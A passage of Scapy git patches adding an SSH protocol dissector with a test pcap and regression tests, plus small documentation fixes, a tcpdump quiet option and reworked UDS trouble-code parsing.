YesNoByteField("first_kex_packet_follows", 0), + IntField("reserved", 0), + ] + + +_SSH_messages[20] = SSHKexInit + +# RFC4253 - sect 7.3 + + +class SSHNewKeys(Packet): + fields_desc = [ + ByteEnumField("type", 21, _SSH_message_numbers), + ] + + +_SSH_messages[21] = SSHNewKeys + + +# RFC4253 - sect 8 + + +class SSHKexDHInit(Packet): + fields_desc = [ + ByteEnumField("type", 30, _SSH_message_numbers), + PacketField("e", Mpint(), Mpint), + ] + + +_SSH_messages[30] = SSHKexDHInit + + +class SSHKexDHReply(Packet): + fields_desc = [ + ByteEnumField("type", 31, _SSH_message_numbers), + SSHPacketStringField("K_S", SSHPublicKey), + PacketField("f", Mpint(), Mpint), + SSHPacketStringField("H_hash", SSHSignature), + ] + + +_SSH_messages[31] = SSHKexDHReply + +# RFC4253 - sect 10 + + +class SSHServiceRequest(Packet): + fields_desc = [ + ByteEnumField("type", 5, _SSH_message_numbers), + PacketField("service_name", SSHString(), SSHString), + ] + + +_SSH_messages[5] = SSHServiceRequest + + +class SSHServiceAccept(Packet): + fields_desc = [ + ByteEnumField("type", 6, _SSH_message_numbers), + PacketField("service_name", SSHString(), SSHString), + ] + + +_SSH_messages[6] = SSHServiceAccept + +# RFC4253 - sect 11.1 + + +class SSHDisconnect(Packet): + fields_desc = [ + ByteEnumField("type", 1, _SSH_message_numbers), + IntEnumField( + "reason_code", + 0, + { + 1: "SSH_DISCONNECT_HOST_NOT_ALLOWED_TO_CONNECT", + 2: "SSH_DISCONNECT_PROTOCOL_ERROR", + 3: "SSH_DISCONNECT_KEY_EXCHANGE_FAILED", + 4: "SSH_DISCONNECT_RESERVED", + 5: "SSH_DISCONNECT_MAC_ERROR", + 6: "SSH_DISCONNECT_COMPRESSION_ERROR", + 7: "SSH_DISCONNECT_SERVICE_NOT_AVAILABLE", + 8: "SSH_DISCONNECT_PROTOCOL_VERSION_NOT_SUPPORTED", + 9: "SSH_DISCONNECT_HOST_KEY_NOT_VERIFIABLE", + 10: "SSH_DISCONNECT_CONNECTION_LOST", + 11: "SSH_DISCONNECT_BY_APPLICATION", + 12: "SSH_DISCONNECT_TOO_MANY_CONNECTIONS", + 13: "SSH_DISCONNECT_AUTH_CANCELLED_BY_USER", + 14: "SSH_DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE", + 15: "SSH_DISCONNECT_ILLEGAL_USER_NAME", + }, + ), + PacketField("description", SSHString(), SSHString), + PacketField("language_tag", SSHString(), SSHString), + ] + + +_SSH_messages[1] = SSHDisconnect + +# RFC4253 - sect 11.2 + + +class SSHIgnore(Packet): + fields_desc = [ + ByteEnumField("type", 2, _SSH_message_numbers), + PacketField("data", SSHString(), SSHString), + ] + + +_SSH_messages[2] = SSHIgnore + +# RFC4253 - sect 11.3 + + +class SSHServiceDebug(Packet): + fields_desc = [ + ByteEnumField("type", 4, _SSH_message_numbers), + YesNoByteField("always_display", 0), + PacketField("message", SSHString(), SSHString), + PacketField("language_tag", SSHString(), SSHString), + ] + + +_SSH_messages[4] = SSHServiceDebug + +# RFC4253 - sect 11.4 + + +class SSHUnimplemented(Packet): + fields_desc = [ + ByteEnumField("type", 3, _SSH_message_numbers), + IntField("seq_num", 0), + ] + + +_SSH_messages[3] = SSHUnimplemented + +# RFC8308 - sect 2.3 + + +class SSHExtension(Packet): + fields_desc = [ + PacketField("extension_name", SSHString(), SSHString), + PacketField("extension_value", SSHString(), SSHString), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class SSHExtInfo(Packet): + fields_desc = [ + ByteEnumField("type", 7, _SSH_message_numbers), + FieldLenField("nr_extensions", None, length_of="extensions"), + PacketListField("extensions", [], SSHExtension), + ] + + +_SSH_messages[7] = SSHExtInfo + +# RFC8308 - sect 3.2 + + +class SSHNewCompress(Packet): + fields_desc = [ + ByteEnumField("type", 3, _SSH_message_numbers), + ] + + +_SSH_messages[8] = SSHNewCompress + +# RFC8709 + + +class SSHPublicKeyEd25519(Packet): + fields_desc = [ + PacketField("key", SSHString(), SSHString), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +_SSH_publickeys[b"ssh-ed25519"] = SSHPublicKeyEd25519 + + +class SSHPublicKeyEd448(Packet): + fields_desc = [ + PacketField("key", SSHString(), SSHString), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +_SSH_publickeys[b"ssh-ed448"] = SSHPublicKeyEd448 + + +class SSHSignatureEd25519(Packet): + fields_desc = [ + PacketField("key", SSHString(), SSHString), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +_SSH_signatures[b"ssh-ed25519"] = SSHSignatureEd25519 + + +class SSHSignatureEd448(Packet): + fields_desc = [ + PacketField("key", SSHString(), SSHString), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +_SSH_signatures[b"ssh-ed448"] = SSHSignatureEd448 + +bind_layers(SSH, SSH) + +bind_bottom_up(TCP, SSH, sport=22) +bind_layers(TCP, SSH, dport=22) diff --git a/test/pcaps/ssh_ed25519.pcap b/test/pcaps/ssh_ed25519.pcap new file mode 100644 index 0000000000000000000000000000000000000000..8d10143541a6f474bcbe2914f7600cd1e71b40c6 GIT binary patch literal 8188 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 Raf4$JsJet$bu@%{=|3UgoE888 literal 0 HcmV?d00001 diff --git a/test/scapy/layers/ssh.uts b/test/scapy/layers/ssh.uts new file mode 100644 index 00000000000..b6c82830c9e --- /dev/null +++ b/test/scapy/layers/ssh.uts @@ -0,0 +1,37 @@ +% SSH regression tests for Scapy + ++ SSH tests + += Load SSH and SSH pcap + +from scapy.layers.ssh import * +pkts = rdpcap(scapy_path("/test/pcaps/ssh_ed25519.pcap")) + += Check for SSHVersionExchange + +assert SSHVersionExchange in pkts[3] +assert pkts[3].lines == [b'SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u1'] + += Check for SSH KexInit + +assert pkts[8].pay.type == 20 +assert pkts[8].pay.kex_algorithms.names == [b'sntrup761x25519-sha512@openssh.com', b'curve25519-sha256', b'curve25519-sha256@libssh.org', b'ecdh-sha2-nistp256', b'ecdh-sha2-nistp384', b'ecdh-sha2-nistp521', b'diffie-hellman-group-exchange-sha256', b'diffie-hellman-group16-sha512', b'diffie-hellman-group18-sha512', b'diffie-hellman-group14-sha256'] +assert pkts[8].pay.compression_algorithms_client_to_server.names == [b'none', b'zlib@openssh.com'] +assert pkts[8].pay.first_kex_packet_follows == 0 + += Check for SSH Kex DH Init + +assert pkts[9].pay.e.value == 2350579254774455149352841074576538343990628078324267734527140871419932900538846241321452574779013468175018290651674793284015144587365340014962083771650859331476013596977123734998706481058518220105378857548427645559226229797476788395456646389818256564838400739135010680681163456095677232493468587230912056633743356721223955966756143014970734820639779746710511156996619195651512803235508645669051962031830043263352566212925544898655158819407252176433755590900240990111833619058714386338971655960765233885975850331922799954445954999296511309262036243757363804224821843032668273263064448847356873248470173458896243397517402866118125112555466428030166305568609671333602038983517505792245686243281766138834921907336198416449172686346486278292406454736650900489703602941311383274571253473117352192402069818356338637658276508681778175858698292872544113899589241205559671386224999719303843179598966006636814844667908804397048115462945951578163865384872376314062218622823399683168509281546378022234848416282276373248755506541244682438394426446625521247772730497030387798046748675856950435919346613694108323269457293633349708282520556429147475379754811181108827452704284587405668562299209768965780662855380191554093502874303015220051947466960323628390298028334555285261078171376959928596505395834904631983924930632066431620277301098016669514461539415396461120090857273167687140578309080011600491384868409678444601854368584606594031430672989514629489628693896623746874263590779323124144977231406480674784862894820443935735009785417326990153059454525335480905124180809168192695170554860881795940302149730125034860576014797577021907464402342887433222178995989216549376816454492040151004613910636289921361266911700572137074963622410473946132501034758965925448585513804452940921661377181371668124810916661795313840472724039889785883499146147917756012320556865741641210760458632895093416475238323450214341924898457846364890041182141641464569458439289152005646151462927271290045368143992045845833755058875621892664952349241777000175525150234301417133611325716295866942917806328460205857145603834255471170372323643072574234093090258963511137747272416302757220165305443240348220594316744411327905569373474701071080394539231361841208268626239088329642014216286141161796678306068065801822739617419769840590119143287370990841250896367782388086153939896000077437989471526045058990545907990089943059323343511158016141104461822684535344848072465778114834380180144470998703244485996404968078774187171096252472206846575112317045051585989901412734220984229769099373462781991394933642599850052765470790711255335450011529534223200229563089616493679704133500670071803056311472370457584460617950784473886654145020569892882621834458180061425761806601776138949785217977296683442504030198235793054259542236826904098257847794792743244091577002001218915723232763883537852453240602434246755006330557239933 + += Check for SSH Kex DH Reply + +assert isinstance(pkts[10].pay, SSHKexDHReply) +assert isinstance(pkts[10].pay.K_S.value.data, SSHPublicKeyEd25519) +assert pkts[10].pay.f.value == 145420364842225773825302401106325914711274265993324154430728894326534621359109155840425186538544552052796050053335958730866886288740744420249345515750154798851184330959497070659898985425204715378366354679146309457749164371561091155243958216182101971799434050687511559028317449152411472762323723877627671103812914723157350965167617881557068354019877391362267976527576493473875435265184048851428107514944286989616342786043599413975131699425817361398892615937862444397978104862748600515902989933687456311656405442430739088222322061894563421315591443786569893421006874109563323602421056664468719115729999515282373592751468532774515579030227333862046510775187524340678261311443115463596625632382798119365245475607690175500571706486276645913449452000600385503347151840872914773898773488397031589360149311688536059026933073591802120869627115324168091970764557964769308675365930500125154235572029870366848539246435374954851006770023189648291776010080795050223050860998900405137902471191697225277049222592746894837282272020541849100564888026189233806723871439229668619801557051355230295711162074261723735096669381118352514087748543069098521714367520620776857909533548692973709024859908263199571215346407936984296807266382121546828903054910125941912141681820440324847067053005923257053547200527533308902169030187411617725866120378101642906954603853930588700927719183637036840650380578915269559991390749067662922590313459051714023483342069069486856997828131877064697883838294364044597377634856362822832142618450301805844505073311557951656608292385708401134544514223462642265767599035258374748229336714718608533685329531126529049892131138601419901815421341388895007293701087086445997233255224283053634387459108049782685439584490166669027769404082346078709263888381794126372684739109951124329930500566714883267402922809647283904702829959640898613561998011861738175990862617646085551086342592758425640217942375761120002214263525285687683437628809639146334705175599606153814250017075639638206689953262483413749172593472713439934441043308651524160071237216451477801106668255062822659635335764848170476026942604710330092513922989750910298327358097823488084536544440798321307308541642435897397586864585774450444856007727437988290169282904777426371810586287022758237175995926455562260123808781040290584381913532810485127812346450200037604344159195037050778864761984776712383681923622054756893185075573777827838180404632794820045063257647197822508971656160962510350864007240071912329456453627835389896781002210494913596666104457655076724437210855739938617334378596008363125551567605259368940675801716 +assert isinstance(pkts[10].pay.H_hash.value.data, SSHSignatureEd25519) +assert pkts[10].pay.H_hash.value.data.key.value == b"\xef\xecj=~\xe4Y'\xe9\xad\xb7?\xfe?[\xf3\xddn\x1e\x91\xb5\x1c\xb6O\xf5&\xc7$\x9f\x0c\xeb\x1c<\xf2n\x87iH\xb9\xaf\xf5\xdfXB\xb7\x99\xd1\xbe%\x92\x98a)+\x01\\\xa7\xb4\xb2\x82!\x05e\x0e" + += Check for the 2 SSH New Msgs + +assert isinstance(pkts[10][SSH:2].pay, SSHNewKeys) +assert isinstance(pkts[12].pay, SSHNewKeys) From 1cd3aa44db01283bff3ffe9267d2dd04cf24b263 Mon Sep 17 00:00:00 2001 From: TAKAHiRO TOMiNAGA <52474650+kokoichi206@users.noreply.github.com> Date: Tue, 21 Nov 2023 00:55:03 +0900 Subject: [PATCH 1136/1632] Fix documentation (#4181) --- doc/scapy/usage.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index e78c0947f46..c32e2420b52 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -391,7 +391,7 @@ The above will send a single SYN packet to Google's port 80 and will quit after From the above output, we can see Google returned “SA” or SYN-ACK flags indicating an open port. -Use either notations to scan ports 400 through 443 on the system: +Use either notations to scan ports 440 through 443 on the system: >>> sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S")) From dd0e497f0f7b916017e1288031b5ed3cdc044417 Mon Sep 17 00:00:00 2001 From: Orgad Shaneh Date: Mon, 20 Nov 2023 18:55:38 +0200 Subject: [PATCH 1137/1632] L2ListenTcpdump: Support quiet mode (#4172) --- scapy/supersocket.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 0a05749f214..caf8b0e23b9 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -484,6 +484,7 @@ def __init__(self, filter=None, # type: Optional[str] nofilter=False, # type: bool prog=None, # type: Optional[str] + quiet=False, # type: bool *arg, # type: Any **karg # type: Any ): @@ -507,7 +508,8 @@ def __init__(self, filter = "not (%s)" % conf.except_filter if filter is not None: args.append(filter) - self.tcpdump_proc = tcpdump(None, prog=prog, args=args, getproc=True) + self.tcpdump_proc = tcpdump( + None, prog=prog, args=args, getproc=True, quiet=quiet) self.reader = PcapReader(self.tcpdump_proc.stdout) self.ins = self.reader # type: ignore From ef1875acdcd6ae65d30311c093288f40fc0e1b9d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 20 Nov 2023 21:24:52 +0000 Subject: [PATCH 1138/1632] enable enumerator unit tests for linux --- test/contrib/automotive/scanner/enumerator.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index 32d9cf1483a..70f725a51ce 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -1,5 +1,5 @@ % Regression tests for enumerators -~ disabled +~ linux + Load general modules From b9482979fb4619e711629f131af58871b9fef497 Mon Sep 17 00:00:00 2001 From: Gal Fudim <32942415+galfudim@users.noreply.github.com> Date: Wed, 8 Nov 2023 08:46:20 -0500 Subject: [PATCH 1139/1632] Fixed typo in routing.rst --- doc/scapy/routing.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/routing.rst b/doc/scapy/routing.rst index 8355ce0c352..883259622da 100644 --- a/doc/scapy/routing.rst +++ b/doc/scapy/routing.rst @@ -105,7 +105,7 @@ Get the route for a specific IP: :py:func:`conf.route.route() ` +Same as IPv4 but with :py:attr:`conf.route6 ` Get default gateway IP address ------------------------------ From 83918924c3227cd16427451ad8ea24766d9db456 Mon Sep 17 00:00:00 2001 From: Omer Rosenbaum <52040016+Omerr@users.noreply.github.com> Date: Mon, 20 Nov 2023 13:55:03 +0200 Subject: [PATCH 1140/1632] Fix broken documentation link --- doc/scapy/layers/tcp.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/tcp.rst b/doc/scapy/layers/tcp.rst index 23bac6f5033..18972139ee1 100644 --- a/doc/scapy/layers/tcp.rst +++ b/doc/scapy/layers/tcp.rst @@ -61,6 +61,6 @@ Use external projects - `muXTCP`_ - Writing your own flexible Userland TCP/IP Stack - Ninja Style!!! - Integrating `pynids`_ -.. _Automata's documentation: ../advanced_usage#automata +.. _Automata's documentation: ../advanced_usage.html#automata .. _muXTCP: http://events.ccc.de/congress/2005/fahrplan/events/529.en.html .. _pynids: http://jon.oberheide.org/pynids/ From 389cb53fc213f99d0104f8c825f9de02504c42da Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 22 Nov 2023 21:54:22 +0100 Subject: [PATCH 1141/1632] IPython banner: restore \n --- scapy/main.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/main.py b/scapy/main.py index b7be643520a..0b33007b0f2 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -843,9 +843,9 @@ def ptpython_configure(repl): # Start IPython or ptipython if conf.interactive_shell in ["ipython", "ptipython"]: + banner += "\n" if conf.interactive_shell == "ptipython": from ptpython.ipython import embed - banner += "\n" else: from IPython import start_ipython as embed try: From 1477ddd5328ed85e81856903b40fea3a1744daba Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 23 Nov 2023 07:54:21 +0100 Subject: [PATCH 1142/1632] readthedocs: fix renamed extra requirement --- .readthedocs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.readthedocs.yml b/.readthedocs.yml index 6c006d87efd..8084a8d4a7f 100644 --- a/.readthedocs.yml +++ b/.readthedocs.yml @@ -24,4 +24,4 @@ python: - method: pip path: . extra_requirements: - - docs + - doc From 088d58ac2aee30091ad389b3625e46dffd651647 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 23 Nov 2023 09:10:10 +0100 Subject: [PATCH 1143/1632] Improve parsing of UDS DTC Snapshots and ExtendedData (#4149) * Improve parsing of UDS DTC Snapshots and ExtendedData * fix unit test * fix unit test * fix unit test --- scapy/contrib/automotive/uds.py | 103 ++++++++++++------ test/contrib/automotive/gm/scanner.uts | 6 + .../automotive/scanner/uds_scanner.uts | 5 + test/contrib/automotive/uds.uts | 37 ++++--- 4 files changed, 102 insertions(+), 49 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 5d67394bc04..f69bdd5d0a8 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -11,6 +11,7 @@ """ import struct +from collections import defaultdict from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitEnumField, BitField, XByteField, FieldListField, \ @@ -18,7 +19,7 @@ ShortField, ObservableDict, XShortEnumField, XByteEnumField, StrLenField, \ FieldLenField, XStrFixedLenField, XStrLenField, FlagsField, PacketListField, \ PacketField -from scapy.packet import Packet, bind_layers, NoPayload +from scapy.packet import Packet, bind_layers, NoPayload, Raw from scapy.config import conf from scapy.error import log_loading from scapy.utils import PeriodicSenderThread @@ -42,6 +43,9 @@ conf.contribs['UDS'] = {'treat-response-pending-as-answer': False} +conf.debug_dissector = True + + class UDS(ISOTP): services = ObservableDict( {0x10: 'DiagnosticSessionControl', @@ -908,6 +912,30 @@ def answers(self, other): bind_layers(UDS, UDS_WMBAPR, service=0x7D) +# ##########################DTC##################################### +class DTC(Packet): + name = 'Diagnostic Trouble Code' + dtc_descriptions = {} # Customize this dictionary for each individual ECU / OEM + + fields_desc = [ + BitEnumField("system", 0, 2, { + 0: "Powertrain", + 1: "Chassis", + 2: "Body", + 3: "Network"}), + BitEnumField("type", 0, 2, { + 0: "Generic", + 1: "ManufacturerSpecific", + 2: "Generic", + 3: "Generic"}), + BitField("numeric_value_code", 0, 12), + ByteField("additional_information_code", 0), + ] + + def extract_padding(self, s): + return '', s + + # #########################CDTCI################################### class UDS_CDTCI(Packet): name = 'ClearDiagnosticInformation' @@ -992,13 +1020,7 @@ class UDS_RDTCI(Packet): ConditionalField(FlagsField('DTCStatusMask', 0, 8, dtcStatusMask), lambda pkt: pkt.reportType in [ 0x01, 0x02, 0x07, 0x08, 0x0f, 0x11, 0x12, 0x13]), - ConditionalField(ByteField('DTCHighByte', 0), - lambda pkt: pkt.reportType in [0x3, 0x4, 0x6, - 0x10, 0x09]), - ConditionalField(ByteField('DTCMiddleByte', 0), - lambda pkt: pkt.reportType in [0x3, 0x4, 0x6, - 0x10, 0x09]), - ConditionalField(ByteField('DTCLowByte', 0), + ConditionalField(PacketField("dtc", None, pkt_cls=DTC), lambda pkt: pkt.reportType in [0x3, 0x4, 0x6, 0x10, 0x09]), ConditionalField(ByteField('DTCSnapshotRecordNumber', 0), @@ -1011,29 +1033,6 @@ class UDS_RDTCI(Packet): bind_layers(UDS, UDS_RDTCI, service=0x19) -class DTC(Packet): - name = 'Diagnostic Trouble Code' - dtc_descriptions = {} # Customize this dictionary for each individual ECU / OEM - - fields_desc = [ - BitEnumField("system", 0, 2, { - 0: "Powertrain", - 1: "Chassis", - 2: "Body", - 3: "Network"}), - BitEnumField("type", 0, 2, { - 0: "Generic", - 1: "ManufacturerSpecific", - 2: "Generic", - 3: "Generic"}), - BitField("numeric_value_code", 0, 12), - ByteField("additional_information_code", 0), - ] - - def extract_padding(self, s): - return '', s - - class DTCAndStatusRecord(Packet): name = 'DTC and status record' fields_desc = [ @@ -1048,7 +1047,6 @@ def extract_padding(self, s): class DTCExtendedData(Packet): name = 'Diagnostic Trouble Code Extended Data' dataTypes = ObservableDict() - fields_desc = [ ByteEnumField("data_type", 0, dataTypes), XByteField("record", 0) @@ -1065,6 +1063,33 @@ class DTCExtendedDataRecord(Packet): ] +class DTCSnapshot(Packet): + identifiers = defaultdict(list) # for later extension + + @staticmethod + def next_identifier_cb(pkt, lst, cur, remain): + return Raw + + fields_desc = [ + ByteField("record_number", 0), + ByteField("record_number_of_identifiers", 0), + PacketListField( + "snapshotData", None, + next_cls_cb=lambda pkt, lst, cur, remain: DTCSnapshot.next_identifier_cb( + pkt, lst, cur, remain)) + ] + + def extract_padding(self, s): + return '', s + + +class DTCSnapshotRecord(Packet): + fields_desc = [ + PacketField("dtcAndStatus", None, pkt_cls=DTCAndStatusRecord), + PacketListField("snapshots", None, pkt_cls=DTCSnapshot) + ] + + class UDS_RDTCIPR(Packet): name = 'ReadDTCInformationPositiveResponse' fields_desc = [ @@ -1092,14 +1117,24 @@ class UDS_RDTCIPR(Packet): ConditionalField(StrField('dataRecord', b""), lambda pkt: pkt.reportType in [0x03, 0x08, 0x09, 0x10, 0x14]), + ConditionalField(PacketField('snapshotRecord', None, + pkt_cls=DTCSnapshotRecord), + lambda pkt: pkt.reportType in [0x04]), ConditionalField(PacketField('extendedDataRecord', None, pkt_cls=DTCExtendedDataRecord), lambda pkt: pkt.reportType in [0x06]) ] def answers(self, other): - return isinstance(other, UDS_RDTCI) \ - and other.reportType == self.reportType + if not isinstance(other, UDS_RDTCI): + return False + if not other.reportType == self.reportType: + return False + if self.reportType == 0x06: + return other.dtc == self.extendedDataRecord.dtcAndStatus.dtc + if self.reportType == 0x04: + return other.dtc == self.snapshotRecord.dtcAndStatus.dtc + return True bind_layers(UDS, UDS_RDTCIPR, service=0x59) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 6a232d94c14..59a5e265dc6 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -108,6 +108,11 @@ config = {} s = EcuState(session=1) +debug_dissector_backup = conf.debug_dissector + +# This tests involves corrupted Packets, therefore we need to disable the debug_dissector +conf.debug_dissector = False + assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), None, **config) config = {"exit_if_service_not_supported": True} assert not e._retry_pkt[s] @@ -125,6 +130,7 @@ assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x67\x01ab"), assert not e._retry_pkt[s] assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x67\x02ab"), **config) assert not e._retry_pkt[s] +conf.debug_dissector = debug_dissector_backup = Simulate ECU and run Scanner diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 8dc67970ae0..df72230dd8d 100644 --- 